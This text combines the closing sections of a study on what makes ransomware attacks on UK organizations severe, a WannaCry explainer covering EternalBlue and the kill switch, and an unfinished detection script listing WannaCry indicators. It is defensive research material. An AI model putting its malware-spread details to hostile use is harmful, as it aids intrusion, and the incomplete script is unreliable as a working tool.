Our hypothesis that there is a relationship between organizational security posture and attack severity was supported. Specifically, a weak security posture was associated with a preponderance of very severe attacks. This suggests that the attacks were detected late, handled badly, or inadequately isolated. Although this observation is relevant to any type of cybercrime, successful ransomware attacks entail unique and rather devastating consequences such as disabled systems, encrypted data and, subsequently, halted business operations. A security weakness that could be easily fixed might cause substantial damage to the victim and even bankruptcy. For example, LogOrgD was infected via a server vulnerability that was widely documented by academics, security vendors and government bodies. Subsequently, the organization lost access to all critical data, including backups. The victim was rapidly losing its customer base and the business was close to bankruptcy. The business owner was particularly distressed and at some point even had suicidal thoughts – a lifetime of hard work was about to turn into ashes. Ultimately, the company managed to survive, but the recovery was lengthy, costly and extremely challenging. Therefore, IT/Security professionals must be extremely vigilant when it comes to protecting their organizations against ransomware. There is no simple technological ‘silver bullet’ that will wipe out the crypto-ransomware threat. Rather, a multi-layered approach is needed which consists of socio-technical measures, zealous front-line managers and active support from senior management [ 8 ]. As an IT/Security Manager from LawEnfJ puts it:

You have to have the fundamentals in place. If you are talking about backups after the event, you are dead in the water. You must have your system set up in a way that actively thwarts these attacks. If you are playing catch-up, then I am sorry, but the game is over at that point. You must stay up-to-date. If you are not staying current in the industry, you are going to get in trouble really quick.

Several respondents commented that if vulnerabilities are not closed down following ransomware attacks, organizations will get attacked again. For example, GovSecJ was attacked 4 times within 6 months. Although the IT/Security Manager wrote a report recommending organizational changes, senior management did not act upon it. Subsequently, three more attacks followed.

Though LawEnfM decided to implement all appropriate changes following the first ransomware attack, ransomware struck a second time during the recovery process, taking advantage of the same vulnerabilities. Since the organization suffered considerably as a result of the two consecutive attacks, the external IT provider decided to pay the ransom as they felt responsible. Following this devastating experience (two attacks within 2 weeks), LawEnfM made several important changes in its approach to cybersecurity. HealthSerJU had to experience two very severe attacks before senior management realized the importance of security controls and measures:

I think both attacks fundamentally came down to the fact that there was an under-appreciation of the importance of IT and, therefore, the focus on ensuring that those systems were properly protected was not there … . If we wanted to take a positive from the attacks, it would be that finally executive management gave IT a profile that it has never had before. (IT/Security Manager, HealthSerJU)

Within our sample, public organizations had considerably stronger security postures than those in the private sector. Totally, 78% of the private organizations that we looked at had weak security postures, as opposed to 38% in the public sector. This may be because public institutions have a stronger regulatory mandate to have IT security policies in place. In the UK, the Cyber Essentials scheme was introduced in 2014 and is required for all central government contracts [ 48 ]. In contrast, in the private sector, the majority of organizations do not mandate their suppliers to have cybersecurity standards in operation [ 4 ].

Of course, the promotion of security standards is one matter, adoption is another and actual compliance yet another again. In the past 12 months, 17 452 Cyber Essentials certificates were issued by the UK government [ 49 ], which, going by the estimated 2.6 million businesses in the country [ 50 ], represents just 0.7% of the population. Within higher education institutions – from which division 29% of our public sector sample was drawn – there has been considerable resistance to the uptake of the Cyber Essentials standard [ 51 ]. The ISO27001 standard has been more widely adopted in the UK, but less so in public administration and educational organizations than elsewhere [ 52 ]. The annual UK Cyber Breaches Surveys of recent years reveal that a growing number of businesses are adopting Cyber Essentials, ISO27001, or other similar policies, but about half still have no such measures in place [ 4 ].

Ransomware attacks, even of the less sophisticated type, can wreak havoc

There was no pronounced effect of the crypto-ransomware propagation class upon attack impact in the sample examined in this study. This is an interesting finding because Generation III crypto-ransomware has the ability to propagate across large networks and completely paralyse organizational operations. As a Detective Sergeant from CyberTR pointed out:

When I first started, the virus was very specific to the machine. The machine that clicked on the email was the machine that got the virus and the ransomware and that was it. More recent variants of ransomware have the ability to spread. There is definitely a distinction between ransomware that will hit a computer and encrypt any physically connected devices such as USBs, storage devices, and it is a lot more simple, and the likes of WannaCry that will travel across networks and spread to all computers. We have seen this evolution, where suspects are using vulnerabilities to spread across networks. This type of ransomware is more prevalent than it ever was because it gives hackers an advantage.

Intuitively, Generation III should bring more devastation. However, our data show otherwise. For example, SecOrgM was infected with the less sophisticated Generation II crypto-ransomware. The victim declared bankruptcy shortly after the attack because the organization did not have backups, could not operate without the hijacked data and at the same time was not able to meet the ransom demands. Similarly, GovSecJN was hit with Generation II ransomware, yet the attack still had a detrimental effect on the victim. Although GovSecJN recovered relatively quickly, data critical to high priority functions was encrypted, affecting essential functions of the organization. Such organizations provide vital services to the local community and many people depend on these services.

By contrast, EducInstFB was attacked with Generation III crypto-ransomware that infected hundreds of devices. EducInstFB and its staff lost access to an enormous volume of data, which had scientific value. Several critical systems were disabled, which stopped the victim from performing their normal daily tasks. The management made a decision to pay the ransom. Although the recovery was lengthy and challenging, EducInstFB eventually repaired its systems and recovered the majority of data. Another victim of Generation III crypto-ransomware – HealthSerJU – was attacked twice, and on both occasions over a thousand devices were infected. Although these attacks had a significant negative effect on the delivery of services, HealthSerJU had effective backups and, therefore, promptly restored its systems. EducOrgA was also infected with Generation III crypto-ransomware, affecting the whole network. However, due to the nature of its business, EducOrgA continued its work as a primary school and teaching activities were not interrupted (while administrative data were gradually restored).

Following these observations, we concluded that the crypto-ransomware propagation class alone may not have a direct impact on the consequences of these attacks. Rather, a combination of factors (e.g. the nature of business, availability of resources to recover data or pay the ransom, the type of systems affected, level of preparedness, etc.) are at play.

Beware the ‘weakest link’

Although Hypothesis 2c was rejected, indicating that the severity of a ransomware attack is not influenced by the attack target (i.e. human or machine), we observed that organizations with a weak posture were much more likely to be attacked via machine vulnerabilities as the point of entry, whereas those with medium or strong security postures were more likely to be attacked via social engineering. This finding could be explained by the fact that many of our study participants trust that technical controls provide an adequate defence against cyberthreats, a belief that is also widespread among industry professionals. Consequently, IT/Security professionals focus on implementing measures like e-mail hygiene, vulnerability and upgrade management and sophisticated monitoring and detection systems, but seem to neglect the ‘human factor’ problem and do not have strong security education and training, the importance of which as a security countermeasure is well established [ 6 , 37 , 38 ]. Therefore, these organizations are attacked via ‘the weakest link’ – they may have an adequate defence from a technical perspective, but weak employee security practices. As the IT/Security Manager from GovSecJ put it:

Effective defence always starts with a user. You need to make sure that along with teaching people how to use your applications, IT systems, you incorporate in there a good amount of cyber security.

In our sample, 27 attacks were successful due to humans opening malicious attachments or clicking on links. Several respondents alluded to shortcomings regarding human error and made appropriate changes. For example, LawEnfM replaced online security training with face-to-face tuition after an employee failed to notice rather obvious signs of a malicious e-mail. A staff member from LawEnfJU shut down their own machine after receiving a ransom note and booted several other machines using their credentials. Although the employee hoped to solve the problem, they instead infected more machines and lost precious time to contain infection. Since then, LawEnfJU implemented a new policy that obliges employees to report any out-of-ordinary activity, no matter how insignificant it seems. The organization regularly sends its employees ‘call and verify’ warnings to remind them of this new rule. However, even with effective security education in place, humans are continually prone to make mistakes and do things they know they probably shouldn’t. For example, an employee from GovSecJN who had recently completed security training still proceeded to open an e-mail attachment, even though he felt it was quite suspicious and potentially risky.

Don’t become an easy target, be careful what you reveal about your organization

Targeted attacks were more likely than opportunistic ones to lead to severe consequences in the observed sample. This result is expected as targeted attacks require a lot of preparation, but the ‘prize’ is much higher:

There is a recent trend of a particular variant of ransomware called BitPaymer, which is seen as a big problem. It seems to me to be very targeted because cybercriminals are making extremely large demands on the businesses, which I have never seen before – £30,000 – so they are clearly very targeted. Cybercriminals know the targets they are going after. (Detective Sergeant, CyberTL)

Such attacks suggest that there is some kind of network reconnaissance behind, so cybercriminals know what company they are targeting and how much to ask for. Cybercriminals will say, ‘Wait there, your turnover is £400m so you can pay maybe £2m’. There are victims out there that have paid up to £1,000,000 or even more to get the decryption key. (Detective Constable, CyberBR)

Clearly, such extravagant amounts would have a more severe effect on an organization than, e.g. the typical £300–500 ransom. In our own sample, one small IT company (VirtOrgD) was asked to pay 75 bitcoins (approximate value £352 000 at the time of the attack), a ransom amount the victim could not afford to pay. After intense negotiations, hackers agreed to reduce the ransom amount to 65 bitcoins, but it was still too high for VirtOrgD. The victim had no choice but to recover from partial backups. In the first stages of recovery the management was not sure if the business was going to survive this attack as the VirtOrgD was rapidly losing its customer base. Through tremendous efforts of staff and with the help of external specialists, VirtOrgD managed to restore its business, although, inevitably, some substantial losses occurred. Similarly, another company (ITOrgJL) was asked to pay 100 bitcoins (approximate value of £470 000 at the time of the attack). ITOrgJL was able to negotiate the ransom down to 15 bitcoins and effectively recovered with a decryption key provided by hackers.

Both VirtOrgD and ITOrgJL had weak security postures, which allowed the attackers not only to penetrate their networks but also to stay undetected for several days, searching for weaknesses that would let them spread within the network and encrypt multiple devices, including servers that held crucial data and systems. This confirms our observation that the majority of targeted attacks were executed against organizations with a weak security posture. The lethality of targeted attacks lies in the attackers’ ability to perform network reconnaissance to find the company’s most critical assets (e.g. backup servers, customer data, etc.) and the security weaknesses that will allow them to hijack those assets. It is up to organizations to take appropriate measures to avoid such dramatic consequences.

Our research findings demonstrate that several factors, including ‘organization sector’, ‘security posture’ and ‘attack type’, influence the degree of severity of ransomware attacks. More specifically, within our sample, private organizations were more likely to experience severe consequences than public ones. Interestingly, the public organizations investigated in this study had considerably stronger security postures than those in the private sector. Private organizations typically operate to generate profit, and any interruption to services can cause them grave damage. Public organizations, by contrast, are funded by the government to serve the public; consequently, financial implications are not always relevant to them. We assert that private organizations need to recognize this vulnerability and ‘up their game’ in the security realm.

Furthermore, organizations that had weak security postures suffered harsher outcomes from ransomware attacks than companies with stronger postures. This finding indicates that the need to strengthen security postures in order to defend organizational assets against ransomware attacks is greater than ever. Hackers are relentlessly taking advantage of well-documented issues (e.g. RDP brute-force, poor security training, insufficient vulnerability management). Organizations must focus on both technical and non-technical controls, as both are vital; one without the other is futile. As our results demonstrate, targeted attacks mainly prey on technical shortcomings, but even if all technical loopholes are closed, hackers can still hit a potential victim by exploiting human weaknesses.

Moreover, targeted attacks brought more devastation to the affected organizations in our sample than opportunistic attacks did. Offenders normally invest more effort in targeted attacks and hence expect higher yields. For example, a thorough investigation of the target may take place, so that the hackers understand how profitable the business is, what information is critical to its continuity and how much the victim can potentially afford to pay. Whether or not the victim pays, they are still going to suffer substantially. If they pay, the ransom is going to be very high and the organization is going to experience considerable financial losses. If the victim does not pay, they are going to suffer not only financially (in many cases, recovery is more expensive than the ransom payment) but also through significant disruption to business operations. Therefore, it is worth making cybersecurity investments rather than facing the consequences of a targeted ransomware attack. As our findings suggest, organizations with stronger security postures are less vulnerable to targeted attacks.

Our results also indicate that ‘organization size’, ‘crypto-ransomware propagation class’ and ‘attack target’ have no significant impact on the severity level of ransomware attacks. Within our sample, organizations of all sizes were afflicted by ransomware attacks, with consequences ranging from less severe (e.g. a relatively short disruption to business continuity and insignificant information loss) to highly severe, where organizations faced a challenging recovery and, in many cases, came very close to bankruptcy. In fact, one organization in our sample (SecOrgM) did not survive the ransomware attack. This finding underlines the indiscriminate nature of ransomware and serves as a caution against common but dangerous attitudes such as ‘hackers could not possibly gain anything from attacking us – we are too small’, ‘we do not hold any state secrets or any other sensitive information that would be of interest to hackers’, ‘hackers are normally after banks as this is where the money is’, etc.

Since 2013, ransomware has evolved considerably and become much more technically advanced and dangerous. Generation III is substantially more of a menace than Generation II because of its greater degree of contagiousness and its ability to self-propagate across infected networks. However, we found that the propagation class of crypto-ransomware by itself had no effect on the severity of crypto-ransomware attacks in the observed sample. Regarding the attack target (i.e. machine vs. human), crypto-ransomware impacts victims equally, regardless of the network access method.

As ransomware attacks continue to hurt businesses around the globe, our results convey several important messages. First, we urge organizations of all sizes, small, medium and large, to strengthen their security posture. Secondly, we specifically stress that the vulnerability of private companies to ransomware attacks must be recognized and addressed. Offenders are aware of their dependency on data and systems and take advantage of it. Thirdly, we conclude that the strength of ransomware lies not in its technical capabilities and rapid evolution; rather, it lies in the relentlessness of hackers who persistently search for a range of weaknesses within organizations. Security holes are widely exploited by perpetrators, but hackers also understand the sentimental value an organization may hold for owners who have possibly spent a lifetime building their business (e.g. the LogOrgD case). Criminals exploit the sense of responsibility that IT and cyber security professionals may experience when a company is suffering significantly from an attack (e.g. LawEnfM), or the responsibility management may feel because their staff face very challenging working conditions during the attack and potentially harsh consequences afterwards (e.g. EducInstFB). All of these factors inevitably make ransomware attacks ever so painful, while hackers persistently do their homework on potential victims; this is why targeted attacks hit even harder.

This work makes a number of valuable contributions to the existing body of academic literature on ransomware. It increases knowledge about factors that can make crypto-ransomware attacks absolutely unbearable for affected organizations. We urge readers to learn from the experiences of victims presented in this work and take appropriate preventative actions to avoid, transfer or mitigate the risks of a crypto-ransomware attack. The article also introduces (see ‘Crypto-ransomware propagation class’ section) a simple but useful set of terms that can be used by various parties (e.g. academics, industry professionals, government bodies, etc.) to refer to different classes of this threat according to the degree of infectiousness, i.e. ‘Generation I’, ‘Generation II’, etc. Finally, we developed an Impact Assessment Instrument, which can be applied in further academic works that specifically focus on the crypto-ransomware impact.

This study has a number of limitations. As always, studying cybercrime is a challenge because researchers are faced with incomplete data, skewed surveys and questionable assumptions. The majority of our respondents were based in one country (the UK). Our sample size of 55, though respectable, is still quite small. Therefore, statistically speaking, the findings cannot be generalized outside the given sample and are only applicable to the observed 55 ransomware attacks. A logical follow-on would be to test our conclusions against a larger, more international data set – but a practical problem is how to readily obtain such data. Typically, ransomware victims do not disclose the full reality of their experiences in official complaints or incident reports [3]. Insurance companies such as Advisen have databases of incidents, but these only include organizations that were insured against cyberattacks and made claims. Unfortunately, these sorts of sampling and access issues are typical in cybersecurity research [25] and, as we saw earlier in Table 1, they greatly complicate comparability between studies. We executed our study as rigorously as we could, combining quantitative and qualitative data, and although we believe it is robust and broadly generalizable, that remains a point of conjecture.

Furthermore, in terms of limitations, in Phase 1, we interviewed one participant per organization. This is a very common limitation in qualitative data collection, where the principal interviewee typically plays the role of a ‘gatekeeper’, especially when the subject matter pertains to highly sensitive and confidential matters within the organization. We used a snowballing sampling strategy in Phase 2 of data collection which, though not ideal, was the only pragmatic way we could collect data on ransomware attacks.

As regards future research, as a next step we plan to learn what makes ransomware so effective in the wider cybercrime eco-system. While in this study we assessed the factors that make these attacks impactful, ransomware is a very complex threat and organized criminals employ various tactics to make these attacks successful. Therefore, we intend to learn about the numerous vulnerabilities that cybercriminals prey on (whether technical, social or psychological), focusing specifically on victims’ decision-making processes regarding ransom payments. The ultimate purpose of that study will be to identify a series of measures that could potentially reduce ransom payments.

We would like to extend our sincere gratitude to all study participants for their invaluable contribution to this research. We greatly appreciate interviewees’ time and genuine effort. We realize some questions may have brought back emotions experienced by victims during attacks; we would like to thank you for your bravery and willingness to tell your story. It is very important that other organizations learn from your experiences. Special thanks to Robert McArdle, the Director of Cybercrime Research Team at Trend Micro, who provided expert advice on technical measures against crypto-ransomware attacks. We would like to acknowledge the relentless commitment of police officers from UK Regional Cybercrime Units in providing data and advising on study results. Please note that the views expressed in this work are ours alone and do not necessarily reflect those of the participants, the commentators or the funding body.

This work was supported by the Engineering and Physical Sciences Research Council [EP/P011721/1].

Questions
Can you please comment on the volume of infection spread?
 Did ransomware take advantage of the local user security context and only encrypted server shares?
 Or did it spread across network, taking advantage of software vulnerabilities or weak admin passwords?
Did disruption to business continuity last for:
 Up to 1 week
 Up to 2 months
 Several months or more
How much information was lost as a result of this attack?
 No loss or some loss acceptable with incremental backups
 Information loss affecting some critical business functions
 Information loss affecting majority or all critical business functions
In your expert opinion, what was the severity of the consequence of this attack on victim organization (‘Low’, ‘Medium’, ‘High’)?
 Why do you think so?
: LawEnfJ had partnerships with other organizations, which involved sharing some systems, including e-mail. An employee received a malicious e-mail in the external partner’s inbox and opened it on a machine belonging to LawEnfJ, infecting the network. An investigation revealed that the partner organization did not have the e-mail hygiene that could have stopped this e-mail from reaching the inbox. Nevertheless, LawEnfJ had an acute awareness of the ransomware threat and abundant knowledge of how to prevent and mitigate ransomware attacks. When the ransomware hit, the organization responded promptly and methodically. All systems and data were recovered over one weekend. Some data were lost as a consequence of the incremental backup practice, which is acceptable industry practice. Following the attack, LawEnfJ instigated a formal agreement with all external partners on the minimal security measures they must implement.
: GovSecJN had multiple layers of security controls to protect its business from cyberthreats. However, when the ransomware attack took place, GovSecJN realized that some controls were not equipped to deal with the incident. For example, a communication plan did not consider the fact that crypto-ransomware has the ability to encrypt systems, including e-mail, stripping organizations of the most common communication methods; business continuity plans did not take into consideration the loss of IT. Although all systems and data were restored in 1 week (from backups), some critical services were unavailable for several days, inevitably affecting customers and staff. Following the attack, GovSecJN implemented several changes, including updated communication and business continuity plans.
: EducInstFB had several serious network oversights (e.g. a lack of network visibility, a flat network structure, poor access control management, poor security practices, ineffective backups) that led to severe consequences: the crypto-ransomware infected the whole network, comprising hundreds of devices. As a result, many vital systems became unresponsive, crippling important business functions. A large amount of data would have been lost as a result of this attack had the organization not paid the ransom. The recovery process was very challenging and lasted for months.

Europol. Internet Organised Crime Threat Assessment, 2020. https://www.europol.europa.eu/sites/default/files/documents/internet_organised_crime_threat_assessment_iocta_2020.pdf

Sophos. The State of Ransomware 2020: Results of an independent survey across 26 countries, 2020. https://www.sophos.com/en-us/medialibrary/Gated-Assets/white-papers/sophos-the-state-of-ransomware-2020-wp.pdf

FBI. 2019 Internet Crime Report, 2020. https://pdf.ic3.gov/2019_IC3Report.pdf [Accessed January 2020]

UK Government. Cyber Security Breaches Survey 2020, 2020. https://www.gov.uk/government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020

Simoiu C, Gates C, Bonneau J, et al. “I was told to buy a software or lose my computer. I ignored it”: A study of ransomware. In: Proceedings of USENIX Symposium on Usable Privacy and Security (SOUPS), Santa Clara, CA, 11–13 August 2019.

Connolly LY, Lang M, Gathegi J, et al. Organisational culture, procedural countermeasures, and employee security behaviour: a qualitative study. Inf Comp Secur 2017; 25: 118–36.

Richardson R, North M. Ransomware: evolution, mitigation and prevention. Int Manage Rev 2017; 13: 10–21.

Connolly L, Wall SD. The rise of crypto-ransomware in a changing cybercrime landscape: taxonomising countermeasures. Comput Secur 2019; 87: 1–18.

Holt T, Bossler A. An assessment of the current state of cybercrime scholarship. Deviant Behav 2014; 35: 20–40.

Rege A. Incorporating the human element in anticipatory and dynamic cyber defense. In: Proceedings of the 2016 IEEE International Conference on Cybercrime and Computer Forensic, Vancouver, BC, 12–14 June 2016, 1–7.

Connolly L, Borrion H. Your money or your business: Decision-making processes in ransomware attacks. In: Proceedings of 2020 International Conference in Information Systems. Association for Information Systems, 14–16 December 2020.

Payne BK, Hawkins B, Xin C. Using labelling theory as a guide to examine the patterns, characteristics, and sanctions given to cybercrimes. Am J Crim Justice 2019; 44: 230–47.

Maimon D, Louderback E. Cyber-dependent crimes: an interdisciplinary review. Annu Rev Criminol 2019; 2: 191–216.

Atapour-Abarghouei A, Bonner S, McGough AS. Volenti non fit injuria: ransomware and its victims. In: 2019 IEEE International Conference on Big Data, IEEE, December 2019, 4701–7.

Choi KS, Scott TM, LeClair DP. Ransomware against police: diagnosis of risk factors via application of cyber-routing activities theory. Int J Forensic Sci Pathol 2016; 4: 253–8.

Zhao JY, Kessler EG, Yu J, et al. Impact of trauma hospital ransomware attack on surgical residency training. J Surg Res 2018; 232: 389–97.

Zhang-Kennedy L, Assal H, Rocheleau J, et al. The aftermath of a crypto-ransomware attack at a large academic institution. In: Proceedings of the 27th USENIX Security Symposium. Baltimore, MD, 15–17 August 2018, 1061–78. ISBN 978-1-939133-04-5.

Hull G, John H, Arief B. Ransomware deployment methods and analysis: views from a predictive model and human responses. Crime Science 2019; 8: 2–22.

Shinde R, Van der Veeken P, Van Schooten S, et al. Ransomware: studying transfer and mitigation. In: Proceedings of the 2016 International Conference on Computing, Analytics and Security Trends (CAST). Pune: IEEE, 19–21 December 2016, 90–5.

Ioanid A, Scarlat C, Militaru G. The effect of cybercrime on Romanian SMEs in the context of wannacry ransomware attacks. In: Proceedings of the European Conference on Innovation and Entrepreneurship, Paris: Academic Conferences International Limited, 21–22 September 2017, 307–13.

Byrne D, Thorpe C. Jigsaw: an investigation and countermeasure for ransomware attacks. In: Proceedings of the European Conference on Cyber Warfare and Security. Dublin: Academic Conferences International Limited, 29–30 June 2017, 656–65.

Riglietti G. Cyber security talks: a content analysis of online discussions on ransomware. Cyber Secur 2017; 1: 156–64.

Agustina JR. Understanding cyber victimization: digital architectures and the disinhibition effect. Int J Cyber Criminol 2015; 9: 35–54.

Ngo FT, Paternoster R. Cybercrime victimization: an examination of individual and situational level factors. Int J Cyber Criminol 2011; 5: 773–93.

Furnell S, Emm D, Papadaki M. The challenge of measuring cyber-dependent crimes. Comput Fraud Secur 2015; 2015: 5–12.

Business Continuity Institute [BCI]. BCI Cyber Resilience Report. Business Continuity Institute, 2018.

Beazley. Breach Briefing, 2019. https://www.beazley.com/Documents/2019/beazley-breach-briefing-2019.pdf

Al-Rimy BAS, Maarof MA, Shaid SZM. Ransomware threat success factors, taxonomy, and countermeasures: a survey and research directions. Comput Secur 2018; 74: 144–66.

Mansfield-Devine S. Securing small and medium-size businesses. Network Secur 2016; 2016: 14–20.

Renaud K. How smaller businesses struggle with security advice. Comput Fraud Secur 2016; 2016: 10–18.

Browne S, Lang M, Golden W. Linking threat avoidance and security adoption: a theoretical model for SMEs. BLED 2015 Proceedings, 2015, 35. http://aisel.aisnet.org/bled2015/35

Smith R. Ransomware is indiscriminate – secure your systems now, Petri, June 7, 2017. https://www.petri.com/ransomware-indiscriminate-secure-systems-now

Kurpjuhn T. The SME security challenge. Comput Fraud Sec 2015; 2015: 5–7.

Bergmann MC, Dreißigacker D, Skarczinski B, et al. Cyber-dependent crime victimization: the same risk for everyone? Cyberpsychol Behav Soc Network 2018; 21: 84–90.

Parkinson S. Are public sector organisations more at risk from cyber-attacks on old computers?, The Conversation, 16 May 2017. https://theconversation.com/are-public-sector-organisations-more-at-risk-from-cyber-attacks-on-old-computers-77802

NIST. Guide for Conducting Risk Assessments, Information Security, NIST Special Publication 800-30. National Institute of Standards and Technology, Gaithersburg, MD, 2012. https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf

Connolly L, Lang M, Wall DS. Information security behavior: a cross-cultural comparison of employees in Ireland and United States. Inf Syst Manage 2019; 36: 306–22.

Connolly L, Lang M, Tygar JD. Employee security behaviour: the importance of education and policies in organisational settings. In: Paspallis N, Raspopulos M, Barry C, et al. (eds.), Advances in Information Systems Development Methods, Tools and Management. Lecture Notes in Information Systems and Organisation. Springer: New York, 2018: 79–96.

Brewer R. Ransomware attacks: detection, prevention and cure. Network Secur 2016; 2016: 5–9.

Connolly L, Wall SD. Hackers are making personalised ransomware to target the most profitable and vulnerable, The Conversation, 2019. https://theconversation.com/hackers-are-making-personalised-ransomware-to-target-the-most-profitable-and-vulnerable-113583

Williams M. 10 disturbing facts about employees and cyber security, Pensar, 13 December 2018. https://www.pensar.co.uk/blog/infographic-10-disturbing-facts-about-employees-and-cyber-security

Browne S, Lang M, Golden W. The insider threat - understanding the aberrant thinking of the rogue ‘Trusted Agent’. In: Proceedings of European Conference on Information Systems, Münster, Germany, 26–29 May 2015.

Creswell JW, Plano Clark VL. Designing and Conducting Mixed Methods Research, 2nd edn. Thousand Oaks, CA: Sage Publications, 2011.

Eisenhardt KM. Building theories from case study research. Acad Manage Rev 1989; 14: 532–50.

Zumbo BD, Gadermann AM, Zeisser C. Ordinal versions of coefficients alpha and theta for Likert rating scales. J Mod Appl Stat Meth 2007; 6: 21–9.

Eurostat. Your key European statistics, Eurostat, 2020. https://ec.europa.eu/eurostat/web/structural-business-statistics/structural-business-statistics/sme

Porcedda MG, Wall DS. Cascade and chain effects in big data cybercrime: lessons from the TalkTalk hack. In: Proceedings of WACCO 2019: 1st Workshop on Attackers and Cyber-Crime Operations, IEEE EuroS&P 2019, Stockholm, 20 June 2019.

UK Government. Procurement Policy Note 09/14: Cyber Essentials Scheme Certification, 2014. https://www.gov.uk/government/publications/procurement-policy-note-0914-cyber-essentials-scheme-certification

UK National Cyber Security Centre: Certificate Search. https://www.ncsc.gov.uk/cyberessentials/search

Eurostat, 2020b. https://ec.europa.eu/eurostat/tgm/table.do?tab=table&init=1&language=en&pcode=tin00170&plugin=1

Chapman J, Chinnaswamy A, Garcia-Perez A. The severity of cyber attacks on education and research institutions: a function of their security posture. In: Proceedings of ICCWS 2018 13th International Conference on Cyber Warfare and Security. Academic Conferences and Publishing Limited, 2018, 111–9.

ISO. ISO Survey, 2019. https://www.iso.org/the-iso-survey.html

Josh Fruhlinger

WannaCry explained: A perfect ransomware storm

Stolen government hacking tools, unpatched Windows systems, and shadowy North Korean operatives made WannaCry a pernicious threat that continues to this day.

What is WannaCry?

WannaCry is a ransomware worm that spread rapidly across a number of computer networks in May of 2017. After infecting a Windows computer, it encrypts files on the PC’s hard drive, making them impossible for users to access, then demands a ransom payment in bitcoin in order to decrypt them.

A number of factors made the initial spread of WannaCry particularly noteworthy: it struck a number of important and high-profile systems, including many in Britain’s National Health Service; it exploited a Windows vulnerability that was suspected to have been first discovered by the United States National Security Agency; and it was tentatively linked by Symantec and other security researchers to the Lazarus Group, a cybercrime organization that may be connected to the North Korean government.

How WannaCry works

The WannaCry ransomware executable works in a straightforward manner and is not considered particularly complex or innovative. It arrives on the infected computer in the form of a dropper, a self-contained program that extracts the other application components embedded within itself. Those components include:

  • An application that encrypts and decrypts data
  • Files containing encryption keys
  • A copy of Tor, used for command-and-control communications with the ransomware gang

Whatever the original WannaCry source code is, it hasn’t been found or made available to researchers, although it’s easy enough for them to examine the binary’s execution. Once launched, WannaCry tries to access a hard-coded URL—this is a kill switch, and we’ll discuss it in more detail in a moment. If the ransomware can connect to that URL, it shuts down; if it can’t, it proceeds to search for and encrypt files in a slew of important formats, ranging from Microsoft Office files to MP3s and MKVs, leaving them inaccessible to the user. It then displays a ransom notice, demanding some Bitcoin—not an outrageous amount, often on the order of $300—to decrypt the files.

How does WannaCry spread?

WannaCry spreads via a flaw in the Microsoft Windows implementation of the Server Message Block (SMB) protocol. The SMB protocol helps various nodes on a network communicate, and an unpatched version of Microsoft’s implementation could be tricked by specially crafted packets into executing arbitrary code, an exploit known as EternalBlue.

The fact that this rather pedestrian executable spread via EternalBlue is ultimately more interesting than the ransomware itself. It is believed that the U.S. National Security Agency discovered this vulnerability and, rather than reporting it to the infosec community, developed the EternalBlue code to exploit it. This exploit was in turn stolen by a hacking group known as the Shadow Brokers, who released it obfuscated in a seemingly political Medium post on April 8, 2017. Microsoft itself had discovered the vulnerability a month prior and had released a patch, but many systems remained unpatched and vulnerable, and WannaCry, aided by EternalBlue, began spreading rapidly on May 12. In the wake of the outbreak, Microsoft slammed the U.S. government for not having shared its knowledge of the vulnerability sooner.

WannaCry kill switch

The WannaCry kill switch is a piece of functionality that requires the executable to try to access the long, gibberish URL iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com before it begins the encryption process. Somewhat counterintuitively, WannaCry only proceeds with its ransomware mission if it fails to connect to the domain; if it can connect, it shuts itself down.

The purpose of this functionality is not entirely clear. Some researchers initially believed this was supposed to be a means for the malware’s creators to pull the plug on the attack. However, Marcus Hutchins, the British security researcher who discovered that WannaCry was attempting to contact this URL, believes it was meant to make analysis of the code more difficult. Many researchers will run malware in a “sandbox” environment, from within which any URL or IP address will appear reachable; by hard-coding into WannaCry an attempt to contact a nonsense URL that wasn’t actually expected to exist, its creators hoped to ensure that the malware wouldn’t go through its paces for researchers to watch.

Hutchins not only discovered the hard-coded URL but paid $10.96 to register the domain and set up a site there. Many instances of WannaCry never ended up encrypting the computers they infected as a result, and this helped blunt, though not stop, the spread of the malware.

Shortly after being hailed as a hero for this, Hutchins was arrested for helping develop different malware in 2014. He eventually pled guilty to related charges, and the judge in the case did not require him to serve jail time beyond his pretrial detention, saying that it was clear he had “turned a corner” in his life.

How to prevent WannaCry ransomware

WannaCry ransomware can be prevented by downloading the appropriate patch for your version of Windows from Microsoft, and the easiest way to do that is to simply update your OS to the most recent version. Ironically, the necessary patch was available before the attack began: Microsoft Security Bulletin MS17-010, released on March 14, 2017, updated the Windows implementation of the SMB protocol to prevent infection via EternalBlue. Despite the fact that Microsoft had flagged the patch as critical, many systems were still unpatched as of May of 2017 when WannaCry began its rapid spread.

For those unpatched systems that are infected, there is little remedy beyond restoring files from a safe backup—so let that be a lesson that you should always back up your files. While those monitoring the bitcoin wallets identified in the extortion message say that some people are paying the ransom, there’s little evidence that they’re regaining access to their files.

How to detect WannaCry

WannaCry can be detected by taking a close look at your system logs and network traffic. Because WannaCry won’t activate if it can contact the “kill switch” URL, it can lurk on your infrastructure without necessarily encrypting your files, so if you have unpatched Windows machines it’s a good idea to try to sniff it out before a change in circumstances causes it to become active.

SolarWinds has a good primer on using your server logs to detect WannaCry’s activities. They advise that you look for file creation events—specifically, files being written with WannaCry’s own document extension—and that you keep an eye out for outbound traffic on the SMBv1 ports, TCP 445 and 139, as well as DNS queries for the kill switch domain. Positive Technologies says you should also be looking for connections to the Tor network on ports 9001 and 9003.
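The following is an added example, not code from the article, from SolarWinds or from Positive Technologies, that turns the indicators just listed into a small log triage script and runs it over constructed sample log lines. Three things in it are assumptions rather than facts from the article: the three-column log format (`NET`, `DNS`, `FILE` lines) is invented for the example and you would map your own firewall, DNS and endpoint exports onto it; the ransomware document extension is a placeholder because the article does not name it; and the SMB fan-out threshold (one host reaching five or more distinct hosts on 445/139) is a heuristic chosen here to separate worm-style spreading from ordinary file-server use.

```python
"""
Added example: triage constructed log lines for the WannaCry indicators the
article names (SMBv1 ports 445/139, DNS lookups of the kill switch domain,
Tor ports 9001/9003, file writes with the ransomware's extension).
"""
import re
from collections import Counter, defaultdict

# Indicators named in the article.
KILL_SWITCH_DOMAIN = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
SMB_PORTS = {445, 139}      # SMBv1 transport ports
TOR_PORTS = {9001, 9003}    # Tor ports the article says to watch

# Assumption: the article does not name WannaCry's document extension, so this
# is a placeholder; substitute the extension from your threat-intelligence feed.
RANSOM_EXT = ".ransomext"

# Assumption: heuristic threshold, not from the article. One machine opening
# SMB sessions to this many distinct hosts is treated as fan-out (worm-style
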